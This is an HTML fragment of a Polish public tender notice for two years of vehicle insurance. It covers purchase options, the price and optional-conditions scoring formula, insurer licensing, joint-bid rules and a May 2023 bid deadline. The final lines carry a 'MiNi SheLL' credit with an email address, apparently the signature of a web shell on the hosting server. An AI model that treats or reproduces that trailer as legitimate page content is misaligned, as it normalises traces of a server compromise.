class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Fakultatywne warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II zamówienia – ubezpieczenia komunikacyjne:<br/>A.	obowiązkowe ubezpieczenie odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych;<br/>B.	ubezpieczenie autocasco;<br/>C.	ubezpieczenie następstw nieszczęśliwych wypadków kierowcy i pasażerów;<br/>D.	ubezpieczenie assistance. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający na podstawie art. 441 ust. 1 ustawy Pzp, zastrzega sobie prawo do jednostronnego (w ramach opcji) rozszerzenia zamówienia do wysokości środków finansowych przyznanych na ten cel, w ramach poszczególnych części. W przypadku skorzystania z Opcji ochrona ubezpieczeniowa (program ubezpieczenia) będzie realizowana na warunkach w wskazanych w opisie przedmiotu zamówienia z uwzględnieniem zaakceptowanych fakultatywnych warunków ubezpieczenia.<br/>2.	Rodzaj i maksymalna wartość opcji. Przedmiotem opcji może być:<br/>2.2.	W CZĘŚCI II zamówienia:<br/>A.	ubezpieczenie obowiązkowej odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych;<br/>B.	ubezpieczenia autocasco;<br/>C.	ubezpieczenia następstw nieszczęśliwych wypadków kierowców i pasażerów;<br/>D.	ubezpieczenia assistance <br/>maksymalnie do wysokości 10 % zamówienia podstawowego w każdym roku polisowym umowy 2 letniej.<br/>Po przekroczeniu limitu wysokość dla Opcji zastosowanie będą miały zapisy umowy generalnej ubezpieczenia w szczególności przewidywane zmiany umowy. <br/>2.3.	Ceny/stawki świadczenia usług w ramach Opcji nie ulegną zmianie w stosunku do określonych w Ofercie dla zamówienia podstawowego (formularz oferty – CZĘŚĆ II – załącznik 1B do SWZ).<br/>3.	Okoliczności skorzystania z opcji:<br/>3.1.	Faktyczne potrzeby Zamawiającego realizowane w ramach Opcji będą zgłaszane <br/>w trakcie obowiązywania umowy w związku z nabyciem środków trwałych, modernizacją/ ulepszeniem środków trwałych, oddaniem do użytku nowych inwestycji, umowami cywilno-prawnymi nakładającymi na Zamawiającego obowiązek ubezpieczenia.<br/>3.2.	Opcja będzie realizowana w oparciu o składki/stawki za poszczególne ryzyka ubezpieczeniowe, tj. rozumiane jako składki/stawki za 12-miesięczny okres ochrony ubezpieczeniowej, rozliczane w systemie pro rata temporis.<br/>3.3.	Zamawiający może złożyć jednostronne oświadczenie woli o wykonaniu Opcji, natomiast Wykonawca zobowiązany jest świadczyć usługi objęte Opcją.<br/>3.4.	Zamawiający gwarantuje jedynie wykonanie zamówienia podstawowego. <br/>3.5.	Wykonawcy nie przysługuje wobec Zamawiającego roszczenie o realizację zamówienia opcjonalnego:<br/>3.5.1.	niezłożenie zlecenia przez Zamawiającego oznacza rezygnację z Opcji. Wykonawcy przysługuje wówczas jedynie wynagrodzenie za realizację zamówienia podstawowego objętego przedmiotem zamówienia. <br/>3.5.2.	Wykonawca składając ofertę, wyraża zgodę na zawarcie Opcji w umowie. Wykonawca nie będzie wnosił oraz zrzeka się jakichkolwiek roszczeń z tytułu braku skorzystania przez Zamawiającego z Opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanym kryteriami i ich wagą:<br/><br/>Kryterium	Waga<br/>Cena za zamówienie podstawowe oraz opcje 90%<br/>Fakultatywne warunki ubezpieczenia	10%<br/><br/>2.	Oferty będą oceniane w odniesieniu do warunków przedstawionych przez Wykonawców w zakresie każdego kryterium, wg następującego wzoru:<br/><br/> P = C + Wf <br/><br/>gdzie:<br/>P	-	suma punktów, jakie Wykonawca uzyskał w poszczególnych kryteriach (Cena oferty za zamówienie podstawowe oraz opcje oraz fakultatywne warunki ubezpieczenia) z dokładnością do dwóch miejsc po przecinku, zgodnie z ogólnie przyjętymi zasadami matematyki;<br/>C - ilość punktów uzyskanych za kryterium cena za zamówienie podstawowe oraz opcje;<br/>Wf - ilość punktów uzyskanych za fakultatywne warunki ubezpieczenia.<br/><br/>2.1.	Ocena ofert w kryterium Cena za zamówienie podstawowe oraz opcje <br/> Cn<br/>C = ––––– x 100 x 90% <br/> Co<br/><br/>gdzie:<br/>Cn	- cena najniższej oferty za zamówienie podstawowe oraz opcje;<br/>Co	- cena oferty ocenianej za zamówienie podstawowe oraz opcje.<br/><br/>2.2.	Ocena ofert w kryterium fakultatywne warunki ubezpieczenia<br/>Wf =(Xa x 10%) = max 10 pkt<br/>Przy czym:<br/>Xa – ilość uzyskanych punktów dla ubezpieczeń komunikacyjnych<br/><br/>3.	Kryterium „Cena za zamówienie podstawowe oraz opcje” rozpatrywane będzie na podstawie ceny ofertowej dla CZĘŚCI II zamówienia za wykonanie zamówienia podstawowego oraz opcji za cały okres zamówienia podanej przez Wykonawcę w Formularzu ofertowym – CZĘŚĆ II zamówienia - załącznik nr 1B. Wykonawca, który przedstawi w Formularzu ofertowym najniższą cenę za wykonanie zamówienia podstawowego oraz opcji za cały okres zamówienia otrzyma maksymalnie 90 pkt.<br/>4.	Fakultatywne warunki ubezpieczenia zostały określone w formularzu ofertowym – CZĘŚĆ II zamówienia - załącznik nr 1B. Za akceptacje poszczególnych fakultatywnych warunków ubezpieczenia zostanie przyznana liczba punktów przypisana danemu fakultatywnemu warunkowi. Liczba punktów możliwa do uzyskania za akceptacje danego fakultatywnego warunku ubezpieczenia wskazana jest w formularzu ofertowym. Wykonawca może otrzymać w kryterium „Fakultatywne warunki ubezpieczenia” maksymalnie 10 pkt.<br/>5.	Zamawiający jako najkorzystniejszą ofertę uzna ofertę Wykonawcy, która uzyska najwyższą ilość punktów w ramach kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Fakultatywne warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile wynika to z odrębnych przepisów): <br/>posiadają zezwolenie na prowadzenie działalności ubezpieczeniowej na terenie Rzeczpospolitej Polskiej, zgodnie z ustawą o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. 2023, poz. 656 ze zm.) w zakresie grup ryzyk objętych przedmiotem zamówienia dla danej części zamówienia lub, w przypadku prowadzenia działalności ubezpieczeniowej na innej podstawie niż zezwolenie, innego dokumentu potwierdzającego, że Wykonawca uprawniony do wykonywania działalności ubezpieczeniowej na terenie Rzeczpospolitej Polskiej w zakresie grup ryzyk objętych przedmiotem zamówienia dla danej części zamówienia.<br/>Wykonawca ma obowiązek posiadania stosownych zezwoleń przez cały okres trwania umowy oraz ich okazywania Zamawiającemu na każde jego wezwanie. W przypadku, gdyby którekolwiek z dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania niniejszej umowy, Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później niż w ostatnim dniu obowiązywania dotychczasowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie składa Pełnomocnik w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale XIII ust. 1 SWZ, składa każdy z Wykonawców. <br/>4.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia brak podstaw do wykluczenia z postępowania powinien wykazać każdy z Wykonawców.<br/>5.	Zgodnie z art. 117 ust. 1 ustawy Pzp Zamawiający określa szczególny, obiektywnie uzasadniony sposób spełniania przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia określonego w niniejszym SWZ warunku udziału w postępowaniu, mając na uwadze, że jest to uzasadnione charakterem zamówienia i jest proporcjonalne, tzn. w odniesieniu do warunków określonych w Rozdziale XII ust. 2.1. SWZ warunki te musi spełniać każdy z wykonawców działających wspólnie<br/>6.	Podmiotowe środki dowodowe, o których mowa w Rozdziale XIII ust. 3 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami określonymi w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić (złożyć) za pośrednictwem Platformy pod adresem: https://powiatopatowski.ezamawiajacy.pl/ na stronie internetowej dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com